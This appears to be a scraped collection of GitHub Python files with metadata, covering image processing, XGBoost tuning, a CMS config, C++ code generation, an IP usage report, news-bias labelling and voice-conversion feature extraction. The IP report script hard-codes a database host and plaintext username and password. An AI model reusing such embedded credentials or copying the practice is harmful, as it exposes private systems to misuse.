1:1+Hor]\n\n\nimg = cv2.imread(\"../renketsu.png\", cv2.IMREAD_GRAYSCALE)\nimg = nichika(img, 1)\nresult = Renketsu(img)\n\ncv2.imwrite(\"myans_61.png\", result)\ncv2.imshow(\"result\", result)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","repo_name":"OverHall27/Gasyori100knock","sub_path":"Question_61_70/myanswers/myans61.py","file_name":"myans61.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28143295175","text":"from xgboost import XGBClassifier\nimport pandas as pd\nfrom sklearn.grid_search import GridSearchCV\nimport time\n\nt_start = time.time()\n\nX_train = pd.read_csv(\"X_train.csv\").drop(columns=[\"Unnamed: 0\",\"index\"], axis=1)\ny_train = pd.read_csv(\"y_train.csv\").drop(columns=[\"Unnamed: 0\",\"id\"], axis=1).target.values\n\n\nparameters = {'min_child_weight': [5, 10],\n 'gamma': [0.01, .1,1],\n 'subsample': [0.8,1],\n 'colsample_bytree': [0.6, 0.8],\n 'max_depth': [3, 5, 7]\n }\n\nparameters = {'learning_rate':[0.02],\n 'min_child_weight': [5],\n 'gamma': [30],\n 'subsample': [0.6],\n 'colsample_bytree': [0.6],\n 'max_depth': [6],\n 'n_estimators':[1000]\n }\n\n\n\nxgbc = XGBClassifier(objective='binary:logistic',\n silent=True, verbose=True, scale_pos_weight=8)# 'scale_pos_weight' to set as the ratio for skewed data\n\nclf_xgbc=GridSearchCV(estimator=xgbc,param_grid=parameters, scoring='roc_auc', cv=3, n_jobs=1,verbose=100)\n\nclf_xgbc.fit(X_train, y_train)\n\n\nprint(\"Best parameters are {}\".format(clf_xgbc.best_params_))\nprint(\"Best score is {}\".format(clf_xgbc.best_score_))\n\n\nt_end = time.time()\nprint(\"It took {} seconds to run this test\".format(t_end-t_start))","repo_name":"amnghd/Uber_Driver_Prediction_Challenge","sub_path":"utility functions/xgboost_hypertunner.py","file_name":"xgboost_hypertunner.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5838842647","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.load(\"Geometry.MuonCommonData.muonIdealGeometryXML_cfi\")\nprocess.load(\"Geometry.RPCGeometry.rpcGeometry_cfi\")\nprocess.load(\"Geometry.MuonNumbering.muonNumberingInitialization_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n 'file:/tmp/carrillo/kktau300GeVx1000WithRPC.root'\n )\n)\n\nprocess.demo = cms.EDAnalyzer('TrackRPC',\n tracks = cms.untracked.string('standAloneMuons'),\n partLabel = cms.untracked.string(\"genParticles\"),\n rootFileName = cms.untracked.string('/tmp/carrillo/hscp.root'),\n\n)\n\n\nprocess.p = cms.Path(process.demo)\n","repo_name":"camilocarrillo/UserCode","sub_path":"TrackRPC/trackrpc_cfg.py","file_name":"trackrpc_cfg.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19819878240","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nfrom ..codegen import Codegen, SIGNED_SOURCE\nfrom ..types import DynamicArrayType\nfrom .type_converter import TypeConverter\n\n\nclass CppEntryStructsCodegen(Codegen):\n def __init__(self, entries):\n super(CppEntryStructsCodegen, self).__init__()\n\n # Keep only one example of each unique typename\n self.unique_types = {x.memory_format.typename: x.memory_format for x in entries}\n\n def preferred_filename(self):\n return \"Entry.h\"\n\n def generate(self):\n template = \"\"\"\n// %%SIGNED_SOURCE%%\n\n#include \n#include \n#include \n#include \n#include \n\n#pragma once\n\nnamespace facebook {\nnamespace profilo {\nnamespace entries {\n\n%%ENTRIES_STRUCTS%%\n\nuint8_t peek_type(const void* src, size_t len);\n\n} // namespace entries\n} // namespace profilo\n} // namespace facebook\n\"\"\".lstrip()\n\n enum = self._generate_entries_structs()\n template = template.replace(\"%%ENTRIES_STRUCTS%%\", enum)\n template = template.replace(\"%%SIGNED_SOURCE%%\", SIGNED_SOURCE)\n return template\n\n def _generate_entries_structs(self):\n\n structs = [\n self._generate_entry_struct(fmt) for fmt in list(self.unique_types.values())\n ]\n\n structs = \"\\n\".join(structs)\n\n return structs\n\n def _generate_entry_struct(self, fmt):\n template = \"\"\"\nstruct __attribute__((packed)) %%TYPENAME%% {\n\n static const uint8_t kSerializationType = %%TYPE_ID%%;\n\n%%FIELDS%%\n\n static void pack(const %%TYPENAME%%& entry, void* dst, size_t size);\n static void unpack(%%TYPENAME%%& entry, const void* src, size_t size);\n\n static size_t calculateSize(%%TYPENAME%% const& entry);\n};\n\"\"\".lstrip()\n\n fields = [\n TypeConverter.get(field[1]).generate_declaration(name=field[0])\n for field in fmt.fields\n ]\n fields = \"\\n\".join(fields)\n fields = Codegen.indent(fields)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%TYPE_ID%%\", str(fmt.type_id))\n template = template.replace(\"%%FIELDS%%\", fields)\n\n return template\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n\n\nclass CppEntryStructsCppCodegen(Codegen):\n def __init__(self, entries):\n super(CppEntryStructsCppCodegen, self).__init__()\n\n # Keep only one example of each unique typename\n self.unique_types = {x.memory_format.typename: x.memory_format for x in entries}\n\n def preferred_filename(self):\n return \"Entry.cpp\"\n\n def generate(self):\n template = \"\"\"\n// %%SIGNED_SOURCE%%\n\n#include \n#include \n#include \n\nnamespace facebook {\nnamespace profilo {\nnamespace entries {\n\n%%ENTRIES_CODE%%\n\nuint8_t peek_type(const void* src, size_t len) {\n const uint8_t* src_byte = reinterpret_cast(src);\n return *src_byte;\n}\n\n} // namespace entries\n} // namespace profilo\n} // namespace facebook\n\"\"\".lstrip()\n\n code = self._generate_entries_code()\n template = template.replace(\"%%ENTRIES_CODE%%\", code)\n template = template.replace(\"%%SIGNED_SOURCE%%\", SIGNED_SOURCE)\n return template\n\n def _generate_entries_code(self):\n\n structs = [\n self._generate_entry_struct(fmt) for fmt in list(self.unique_types.values())\n ]\n\n structs = \"\\n\".join(structs)\n\n return structs\n\n def _generate_entry_struct(self, fmt):\n template = \"\"\"\n%%PACKCODE%%\n\n%%UNPACKCODE%%\n\n%%CALCULATESIZECODE%%\n\"\"\".lstrip()\n\n pack_code = self._generate_pack_code(fmt)\n unpack_code = self._generate_unpack_code(fmt)\n calcsize_code = self._generate_calcsize_code(fmt)\n\n template = template.replace(\"%%PACKCODE%%\", pack_code)\n template = template.replace(\"%%UNPACKCODE%%\", unpack_code)\n template = template.replace(\"%%CALCULATESIZECODE%%\", calcsize_code)\n\n return template\n\n def _generate_pack_code(self, fmt):\n template = \"\"\"\n/* Alignment requirement: dst must be 4-byte aligned. */\nvoid %%TYPENAME%%::pack(const %%TYPENAME%%& entry, void* dst, size_t size) {\n if (size < %%TYPENAME%%::calculateSize(entry)) {\n throw std::out_of_range(\"Cannot fit %%TYPENAME%% in destination\");\n }\n if (dst == nullptr) {\n throw std::invalid_argument(\"dst == nullptr\");\n }\n uint8_t* dst_byte = reinterpret_cast(dst);\n *dst_byte = kSerializationType;\n size_t offset = 1;\n\n%%MEMCOPIES%%\n}\n\"\"\".lstrip()\n\n memcopies = []\n for idx, (name, ftype) in enumerate(fmt.fields):\n\n if isinstance(ftype, DynamicArrayType) and idx != len(fmt.fields) - 1:\n # HACK: figure out how to propagate dynamic offsets in the\n # packing/unpacking code\n raise ValueError(\n \"DynamicArrayType entries are only allowed\" \" as the last member\"\n )\n\n memcpy = TypeConverter.get(ftype).generate_pack_code(\n from_expression=\"entry.{name}\".format(name=name),\n to_expression=\"dst_byte\",\n offset_expr=\"offset\",\n )\n memcopies.append(memcpy)\n memcopies = \"\\n\".join(memcopies)\n memcopies = Codegen.indent(memcopies)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%MEMCOPIES%%\", memcopies)\n return template\n\n def _generate_unpack_code(self, fmt):\n template = \"\"\"\n/* Alignment requirement: src must be 4-byte aligned. */\nvoid %%TYPENAME%%::unpack(%%TYPENAME%%& entry, const void* src, size_t size) {\n if (src == nullptr) {\n throw std::invalid_argument(\"src == nullptr\");\n }\n const uint8_t* src_byte = reinterpret_cast(src);\n if (*src_byte != kSerializationType) {\n throw std::invalid_argument(\"Serialization type is incorrect\");\n }\n size_t offset = 1;\n%%MEMCOPIES%%\n}\n\"\"\".lstrip()\n\n memcopies = []\n for name, ftype in fmt.fields:\n memcpy = TypeConverter.get(ftype).generate_unpack_code(\n from_expression=\"src_byte\",\n to_expression=\"entry.{name}\".format(name=name),\n offset_expr=\"offset\",\n )\n memcopies.append(memcpy)\n memcopies = \"\\n\".join(memcopies)\n\n memcopies = Codegen.indent(memcopies)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%MEMCOPIES%%\", memcopies)\n return template\n\n def _generate_calcsize_code(self, fmt):\n template = \"\"\"\nsize_t %%TYPENAME%%::calculateSize(%%TYPENAME%% const& entry) {\n size_t offset = 1 /*serialization format*/;\n%%EXPRESSIONS%%\n return offset;\n}\n\"\"\".lstrip()\n\n expressions = [\n TypeConverter.get(ftype).generate_runtime_size_code(\n \"entry\",\n fname,\n \"offset\",\n )\n for fname, ftype in fmt.fields\n ]\n expressions = \"\\n\".join(expressions)\n expressions = Codegen.indent(expressions)\n\n template = template.replace(\"%%TYPENAME%%\", fmt.typename)\n template = template.replace(\"%%EXPRESSIONS%%\", expressions)\n return template\n","repo_name":"facebookarchive/profilo","sub_path":"cpp/codegen/cpp/entry_structs.py","file_name":"entry_structs.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"en","doc_type":"code","stars":1576,"dataset":"github-code","pt":"53"} +{"seq_id":"23079345856","text":"import pymysql\nfrom datetime import datetime\nfrom collections import defaultdict\n\nsql_dict = {\n 'host': '10.10.180.145',\n 'user': 'hourong',\n 'password': 'hourong',\n 'charset': 'utf8',\n 'db': 'IP'\n}\n\ncount_dict = defaultdict(list)\nint_split = 30\nif __name__ == '__main__':\n _count = 0\n conn = pymysql.connect(**sql_dict)\n with conn as cursor:\n # IP\n # cursor.execute('''SELECT\n # ip_address,\n # group_concat(u_time ORDER by u_time)\n # FROM ip_used\n # GROUP BY ip_address''')\n # local proxy\n cursor.execute('''SELECT\n local_proxy,\n group_concat(u_time ORDER by u_time)\n FROM ip_used\n GROUP BY local_proxy''')\n for line in cursor.fetchall():\n _count += 1\n if _count % 10000 == 0:\n print(_count)\n ip, times = line\n time_list = times.decode().split(',')\n if len(time_list) == 1:\n count_dict[-1].append(ip)\n\n else:\n for i in range(len(time_list) - 1):\n try:\n last = datetime.strptime(time_list[i + 1], '%Y-%m-%d %X')\n first = datetime.strptime(time_list[i], '%Y-%m-%d %X')\n except Exception:\n continue\n\n res = (last - first).seconds // 60\n\n count_dict[res // int_split].append(ip)\n\n # print(count_dict)\n x_data = []\n y_data = []\n for k in sorted(count_dict.keys()):\n v = count_dict[k]\n if k == -1:\n print('1 times', len(v))\n x_data.append('一次')\n y_data.append(len(v))\n else:\n print(str(30 * k) + ' - ' + str(30 + 30 * k), len(v))\n x_data.append(str(30 * k) + ' - ' + str(30 + 30 * k))\n y_data.append(len(v))\n conn.close()\n print(x_data)\n print(y_data)\n","repo_name":"20113261/p_m","sub_path":"IP_report/ip_report.py","file_name":"ip_report.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4237528731","text":"#################### Select news sources #################### \nimport pandas as pd \nimport numpy as np\nimport os\n\ndata_preparation_path = os.path.join(os.path.dirname(os.path.abspath(__file__)))\nos.chdir(data_preparation_path)\n\nlabels = pd.read_csv('labels.csv')\n\nlabels.rename(columns={'Unnamed: 0': 'Source'}, inplace=True)\n\n# Removing German articles of Spiegel\nlabels.drop(index=np.array(labels.index)[labels['Source']=='Spiegel'], inplace=True)\nlabels.reset_index(drop=True, inplace=True)\n\n\nunwanted_columns = ['NewsGuard, Does not repeatedly publish false content',\n 'NewsGuard, Gathers and presents information responsibly',\n 'NewsGuard, Regularly corrects or clarifies errors',\n 'NewsGuard, Handles the difference between news and opinion responsibly',\n 'NewsGuard, Avoids deceptive headlines',\n 'NewsGuard, Website discloses ownership and financing',\n 'NewsGuard, Clearly labels advertising',\n \"NewsGuard, Reveals who's in charge, including any possible conflicts of interest\",\n 'NewsGuard, Provides information about content creators',\n 'NewsGuard, score',\n 'NewsGuard, overall_class',\n 'Pew Research Center, known_by_40%',\n 'Pew Research Center, total',\n 'Pew Research Center, consistently_liberal',\n 'Pew Research Center, mostly_liberal',\n 'Pew Research Center, mixed',\n 'Pew Research Center, mostly conservative',\n 'Pew Research Center, consistently conservative',\n 'Wikipedia, is_fake',\n 'Open Sources, reliable',\n 'Open Sources, fake',\n 'Open Sources, unreliable',\n 'Open Sources, bias',\n 'Open Sources, conspiracy',\n 'Open Sources, hate',\n 'Open Sources, junksci',\n 'Open Sources, rumor',\n 'Open Sources, blog',\n 'Open Sources, clickbait',\n 'Open Sources, political',\n 'Open Sources, satire',\n 'Open Sources, state',\n 'PolitiFact, Pants on Fire!',\n 'PolitiFact, False',\n 'PolitiFact, Mostly False',\n 'PolitiFact, Half-True',\n 'PolitiFact, Mostly True',\n 'PolitiFact, True']\n# 'BuzzFeed, leaning'\nlabels_wanted = labels.drop(unwanted_columns, axis=1)\n\n# buzzfeed news source count\nnum_buzzfeed_outlets = np.invert(pd.isna(labels_wanted['BuzzFeed, leaning'])).sum()\n\n##### Allsides Dataset (chosen) ###############################################\n\n# labeled lean left\nallsides_lean_left = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Lean Left'])\n# labeled lean right\nallsides_lean_right = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Lean Right'])\n# labeled: center\nallsides_center = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Center'])\n# labeled: right\nallsides_right = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Right'])\n# labeled: left\nallsides_left = list(labels_wanted['Source']\n [labels_wanted['Allsides, bias_rating']=='Left'])\n\nallsides_sources = allsides_center + allsides_lean_left + allsides_lean_right \\\n + allsides_left + allsides_right\nallsides_bias_labels = len(allsides_center) * ['Center'] \\\n + len(allsides_lean_left) * ['Lean Left'] \\\n + len(allsides_lean_right) * ['Lean Right'] \\\n + len(allsides_left) * ['Left'] \\\n + len(allsides_right) * ['Right']\n\n\nnum_allsides_outlets = len(allsides_bias_labels)\n\n# saving to csv\nallsides_sources_with_labels = pd.DataFrame({'Source': allsides_sources,\n 'bias':allsides_bias_labels})\n\nallsides_sources_with_labels.to_csv(os.path.join('allsides_data', 'allsides_bias_labels.csv'), index=False)\n\n\n##### MediaBias/FactCheck dataset (disregarded) ###################################\n\n# labeled: least biased\nmbfc_least_biased = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='least_biased'])\n# labeled: left bias\nmbfc_left_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='left_bias'])\n# labeled: right bias\nmbfc_right_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='right_bias'])\n# labeled: left center bias\nmbfc_left_center_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='left_center_bias'])\n# labeled: right center bias\nmbfc_right_center_bias = list(labels_wanted['Source']\n [labels_wanted['Media Bias / Fact Check, label']\n =='right_center_bias'])\n# variable: extreme left\nmbfc_extreme_left = list(labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n [labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n ['Media Bias / Fact Check, extreme_left']==1]['Source'])\n# variable: extreme right\nmbfc_extreme_right = list(labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n [labels_wanted.dropna(subset=['Media Bias / Fact Check, right'])\n ['Media Bias / Fact Check, extreme_right']==1]['Source'])\n\nmbfc_sources = mbfc_least_biased + mbfc_left_bias + mbfc_right_bias \\\n + mbfc_left_center_bias + mbfc_right_center_bias \\\n + mbfc_extreme_left + mbfc_extreme_right\n\nmbfc_bias_labels = len(mbfc_least_biased) * ['least_biased'] \\\n + len(mbfc_left_bias) * ['left_bias'] \\\n + len(mbfc_right_bias) * ['right_bias'] \\\n + len(mbfc_left_center_bias) * ['left_center_bias'] \\\n + len(mbfc_right_center_bias) * ['right_center_bias'] \\\n + len(mbfc_extreme_left) * ['extreme_left'] \\\n + len(mbfc_extreme_right) * ['extreme_right'] \n\nnum_mbfc_outlets = len(mbfc_bias_labels)\n\nmbfc_sources_with_labels = pd.DataFrame({'Source': mbfc_sources,\n 'bias':mbfc_bias_labels})\n# saving to csv\nmbfc_sources_with_labels.to_csv('mbfc_full/mbfc_full_for_counting_bias_labels.csv', index=False)\n\n\n##### SQL commands ################################################################\n#############################################\nsql_sources = allsides_sources # mbfc_sources\n#############################################\nsql_string = 'DELETE FROM articles WHERE '\nfor i,source in enumerate(mbfc_sources):\n if i != len(mbfc_sources) -1:\n sql_string +='NOT source=' + \"'\" + source + \"'\"+ ' AND '\n else: \n sql_string +='NOT source=' + \"'\" + source + \"'\"\n\nprint(sql_string)\n","repo_name":"Tobias-K93/media-bias-prediction","sub_path":"data_preparation/0_select_news_sources.py","file_name":"0_select_news_sources.py","file_ext":"py","file_size_in_byte":6649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27696098817","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Created on 9:21 AM 11/30/18\n @author: ngunhuconchocon\n @brief: This script is made to construct frame-wise dictionary between src and tar spectra\n For short, it create dicts of exemplars ( a_i, b_i pairs)\n\"\"\"\n\nfrom __future__ import print_function\nfrom tqdm import tqdm\n\nfrom utils import config_get_config, logdir, io_read_speaker_data, io_save_to_disk\n\nimport pickle\nimport configparser\n\nimport os\nimport pdb\n\nimport librosa as lbr\nimport pysptk\nfrom dtw import dtw\nfrom fastdtw import fastdtw\n# from dtaidistance.dtw import distance_fast, best_path, best_path2, warping_paths\nfrom librosa import display\n\nimport pyworld as pw\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# for debugging\nimport logging\nimport cProfile\nimport datetime\nimport itertools\nimport time\n\nfrom multiprocessing import Pool, cpu_count\n\n\nlogging.basicConfig(\n filename=\"logs/\" + \":\".join(str(datetime.datetime.now()).split(\":\")[:-1]),\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s',\n datefmt=\"%Y-%m-%d %H:%M:%S\"\n)\n\ntry:\n import coloredlogs\n coloredlogs.install(level=logging.DEBUG, fmt='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s')\nexcept ModuleNotFoundError:\n pass\n\n# parse the configuration\nargs = config_get_config(\"config/config\")\n\nframe_length = int(args['feat_frame_length'])\noverlap = float(args['feat_overlap'])\n# hop_length = int(frame_length * overlap) + 300\nhop_length = int(args['feat_hop_length'])\norder = int(args['feat_order'])\nalpha = float(args['feat_alpha'])\ngamma = float(args['feat_gamma'])\n\ndata_path = args['DataPath']\nspeakerA = args['SpeakerA']\nspeakerB = args['SpeakerB']\nfeature_path = args['feature_path']\nsr = int(args['sampling_rate'])\n\nf0_floor = int(args['f0_floor'])\n\ncpu_rate = float(args['cpu_rate'])\nnb_file = int(args['nb_file'])\n\n# frame_length = pw.get_cheaptrick_fft_size(sr, f0_floor)\n# frame_length = pw.get_cheaptrick_fft_size(sr, f0_floor)\n\nlogging.info(\"{}% cpu resources ({} cores) will be used to run this script\".format(cpu_rate * 100, int(cpu_rate * cpu_count())))\nlogging.info(\"START EXTRACTING ...\")\n\n\n# This is wrong (as we need MCEP, not MFCC). Nevertheless, preserving this is necessary.\n# Updated 2018 Dec 14: Edit feat_mfccs to extract_features, with multiple choice of choosing feature to extract. Default is mcep\n# TODO feat argument need to be implement as a list, support multiple feature-type return\ndef _extract_features(audiodatum, speaker, sr=16000, feat='mcep'):\n \"\"\"\n Note: this is file-based implementation for multiprocessing. Different from non-parallel version\n Feature extraction. For each type of feature, see corresponding case below\n Currently support: MCEP, MFCC. Will be updated when needed\n :param audiodatum: 162 files time-series data\n :param sr: sampling rate.\n :param feat: type of currently supported feature\n :return:\n \"\"\"\n if feat.lower() == 'mfcc':\n \"\"\"\n extract mfcc from audio time series data (from librosa.load)\n \"\"\"\n # mfcc = lbr.util.normalize(lbr.feature.mfcc(audiodatum, sr=sr, n_fft=frame_length, hop_length=hop_length), norm=1, axis=0)\n mfcc = lbr.feature.mfcc(audiodatum, sr=sr, n_fft=frame_length, hop_length=hop_length)\n\n # return np.stack(mfccs)\n return mfcc\n\n elif feat.lower() == 'mcep' or feat.lower() == 'mcc':\n \"\"\" \n MCEP is extracted via pysptk. See the link below for more details\n https://github.com/eYSIP-2017/eYSIP-2017_Speech_Spoofing_and_Verification/wiki/Feature-Extraction-for-Speech-Spoofing\n \n Example of using pysptk to extract mcep (copied from the above link): \n frameLength = 1024\n overlap = 0.25\n hop_length = frameLength * overlap\n order = 25\n alpha = 0.42\n gamma = -0.35\n \n sourceframes = librosa.util.frame(speech, frame_length=frameLength, hop_length=hop_length).astype(np.float64).T\n sourceframes *= pysptk.blackman(frameLength)\n sourcemcepvectors = np.apply_along_axis(pysptk.mcep, 1, sourceframes, order, alpha)\n \"\"\"\n # Check if data exists\n temp_filename = os.path.join(feature_path, \"{}_{}.pkl\".format(speaker, feat))\n\n frame = lbr.util.frame(audiodatum, frame_length=frame_length, hop_length=hop_length).T\n frame *= pysptk.blackman(frame_length)\n\n mcep = np.apply_along_axis(pysptk.mcep, 1, frame, order=order, alpha=alpha).T\n\n # Save to .pkl for later load\n # Move to calculating multiprocess call.\n # with open(temp_filename, \"wb\") as f:\n # pickle.dump(mceps, f, protocol=3)\n\n return mcep\n else:\n logging.critical('{} feature is not supported yet, exiting ...')\n exit()\n\n\ndef extract_features(audiodata, speaker, sr=16000, feat='mcep'):\n \"\"\"\n This will use multiprocess.Pool to parallel call _extract_features\n\n For example\n from multiprocessing import Pool\n p = Pool(5)\n def f(x):\n return x*x\n p.map(f, [1,2,3])\n\n :param audiodata:\n :param speaker:\n :param sr:\n :param feat:\n :return:\n \"\"\"\n # print(\"=======================\")\n logging.info(\"Extracting {} from {}'s data ...\".format(feat, speaker))\n temp_filename = os.path.join(feature_path, \"{}_{}.pkl\".format(speaker, feat))\n\n if os.path.isfile(temp_filename):\n logging.info(\"Found {}. Load data from {}_{}\".format(temp_filename, speaker, feat))\n\n with open(temp_filename, \"rb\") as f:\n return pickle.load(f), feat\n else:\n n_workers = int(cpu_rate * cpu_count())\n p = Pool(n_workers)\n\n results = p.starmap(_extract_features, zip(audiodata, itertools.repeat(speaker), itertools.repeat(sr), itertools.repeat(feat)))\n\n # print(feat)\n with open(temp_filename, \"wb\") as f:\n pickle.dump(results, f, protocol=3)\n\n return results, feat\n # raise NotImplementedError\n\n\n# EDIT 2018 Dec 17: This function will be removed. It will later be split to 3 separated function: `make_A`, `make_R`, `make_W`\n# See commit 4b0d1d716821934afb53b086bb9e351cc5d53f5b for \"before separating behavior\"\ndef make_dict_from_feat(feat_A, feat_B):\n \"\"\"\n Final function: return the \"dictionary\" of exemplars, which is construct by alignment of DTW\n Tentative: return a list, each item is a tuple size of 2, which is A and B, for src and tar speaker\n :param dtw_path: path[0], path[1]\n :return:\n \"\"\"\n dtw_paths = []\n\n for i in range(len(feat_A)):\n # dist, cost, cum_cost, path = dtw(feat_A[i].T, feat_B[i].T, lambda x, y: np.linalg.norm(x - y, ord=1))\n dist, path = fastdtw(feat_A[i].T, feat_B[i].T, dist=lambda x, y: np.linalg.norm(x - y, ord=1))\n dtw_paths.append(path)\n\n exemplars = []\n for idx_file, path in tqdm(enumerate(dtw_paths)):\n a = []\n b = []\n\n for it in range(len(path[0])):\n try:\n a.append(feat_A[idx_file].T[path[0][it]])\n b.append(feat_B[idx_file].T[path[1][it]])\n except Exception as e:\n input(\"Error occur. Press any key to exit ...\")\n exit()\n\n exemplars.append(np.stack([np.asarray(a), np.asarray(b)], axis=0))\n return exemplars\n\n\ndef _dtw_alignment(feat_A, feat_B):\n \"\"\"\n Note: this is file-based implementation for multiprocessing. Different from non-parallel version\n Calculate dtw_path, for constructing exemplar dictionaries (see make_exemplar_dict_A, R, W)\n :param feat_A: 1 audio file, with shape of (mel order, n_frames) (Note: not 162, this is function for parallel)\n :param feat_B: 1 audio file, with shape of (mel order, n_frames) (Note: not 162, this is function for parallel)\n :return: dtw path of 1 file\n \"\"\"\n logging.info(\"DTW on MCEP: Calculating warping function ...\")\n\n # dist, cost, cum_cost, path = dtw(feat_A.T, feat_B.T, lambda x, y: np.linalg.norm(x - y, ord=1))\n dist, cost, cum_cost, path = dtw(feat_A.T, feat_B.T, lambda x, y: sum(np.square(x - y)))\n\n return path\n\n\ndef dtw_alignment(feat_full_A, feat_full_B):\n \"\"\"\n This will use multiprocess.Pool to parallel call _dtw_alignment\n\n Calculate dtw_path, for constructing exemplar dictionaries (see make_exemplar_dict_A, R, W)\n :param feat_A: shape of (162 audio file, ...)\n :param feat_B: shape of (162 audio file, ...)\n :return: dtw path of 162 file\n \"\"\"\n logging.info(\"Parallel: DTW on MCEP: Calculating warping function ...\")\n\n # For parallel\n n_workers = int(cpu_rate * cpu_count())\n p = Pool(n_workers)\n dtw_paths = p.starmap(_dtw_alignment, zip(feat_full_A, feat_full_B))\n\n logging.info(\"Finish aligning. Warping mcep .... \")\n\n return dtw_paths, None, None\n\n # exemplars = []\n # full_A = []\n # full_B = []\n # for idx_file, path in tqdm(enumerate(dtw_paths)):\n # a = []\n # b = []\n #\n # for it in range(len(path[0])):\n # try:\n # a.append(feat_A[idx_file].T[path[0][it]])\n # b.append(feat_B[idx_file].T[path[1][it]])\n # except Exception as e:\n # input(\"Error occur. Press any key to exit ...\")\n # exit()\n #\n # full_A.append(np.asarray(a))\n # full_B.append(np.asarray(b))\n # # exemplars.append(np.stack([np.asarray(a), np.asarray(b)], axis=0))\n #\n # return dtw_paths, full_A, full_B\n\n\ndef make_exemplar_dict_A(dtw_paths, feat_A):\n \"\"\"\n :param feat_A: shape (162, ...)\n :param dtw_paths: shape (162 audio file, ...)\n :return: A_exemplar_dict.\n \"\"\"\n A_exemplars_dict = []\n\n for idx, path in enumerate(dtw_paths):\n temp = []\n for i in range(len(path[1])):\n temp.append(feat_A[idx][path[1][i]])\n\n A_exemplars_dict.append(np.asarray(temp))\n\n return A_exemplars_dict\n\n\ndef make_exemplar_dict_W(dtw_paths):\n return [path[0] for path in dtw_paths], [path[1] for path in dtw_paths]\n\n\ndef make_exemplar_dict_R(dtw_paths, feat_B):\n \"\"\"\n :param feat_A: shape (162, ...)\n :param dtw_paths: shape (162 audio file, ...)\n :return: A_exemplar_dict.\n \"\"\"\n R_exemplars_dict = []\n B_exemplars_dict = []\n\n for idx, path in enumerate(dtw_paths):\n temp = []\n for i in range(len(path[1])):\n temp.append(feat_B[idx][path[1][i]])\n\n B_exemplars_dict.append(np.asarray(temp))\n\n print(B_exemplars_dict[0].shape)\n for idx, exemplar in enumerate(B_exemplars_dict):\n temp = []\n for jjj in range(len(exemplar)):\n temp.append(np.exp(np.log(np.clip(feat_B[idx][jjj], 1e-10, None) - np.log(np.clip(exemplar[jjj], 1e-10, None)))))\n\n R_exemplars_dict.append(np.asarray(temp))\n\n return R_exemplars_dict\n\n# End of 2018 Dec 17 editing\n\n\n# EDIT: Add pickling exemplar dictionaries\ndef io_save_exemplar_dictionaries(exemplar_dict, protocol=3, savepath=\"data/vc/exem_dict\"):\n \"\"\"\n This function pickles every variables (exemplar dictionaries in this case) in args\n :param exemplar_dict:\n :param protocol:\n :param savepath:\n :return:\n \"\"\"\n os.system(\"mkdir -p {}\".format(savepath))\n\n for filename, value in exemplar_dict.items():\n with open(os.path.join(savepath, filename), \"wb\") as f:\n pickle.dump(value, f, protocol=protocol)\n\n logging.info(\"Done pickling warping function!!! Files are saved in data/vc/exem_dict/exemplar_W_A and B\")\n # raise NotImplementedError\n\n\ndef final_make_dict():\n # TODO should add argument to python call\n # TODO to specify which speaker to cover\n\n # Read audio time-series from npy\n logging.info(\"===================================================\")\n logging.info(\"Start reading audio time-series ...\")\n speakerAdata = io_read_speaker_data(data_path, speakerA, savetype='npy', parallel=True)[:nb_file]\n speakerBdata = io_read_speaker_data(data_path, speakerB, savetype='npy')[:nb_file]\n\n # Extract features from time-series FOR DTW-ALIGNMENT (f0, sp, ap is not included here)\n logging.info(\"===================================================\")\n logging.info(\"Start extracting mel feature for dtw alignment ...\")\n # feat_A, feat_type_A = extract_features(speakerAdata, speakerA, sr=sr, feat='mcep')\n # feat_B, feat_type_B = extract_features(speakerBdata, speakerB, sr=sr, feat='mcep')\n feat_A, feat_type_A = extract_features(speakerAdata, speakerA, sr=sr, feat='mfcc')\n feat_B, feat_type_B = extract_features(speakerBdata, speakerB, sr=sr, feat='mfcc')\n assert feat_type_A == feat_type_B, \"Inconsistent feature type. 2 speaker must have the same type of extracted features.\"\n\n # Get dtw path. Note that feat_A and feat_B will be transposed to (n_frames, mel-cepstral order) shape\n logging.info(\"===================================================\")\n logging.info(\"Start aligning (with dtw) ...\")\n dtw_paths, 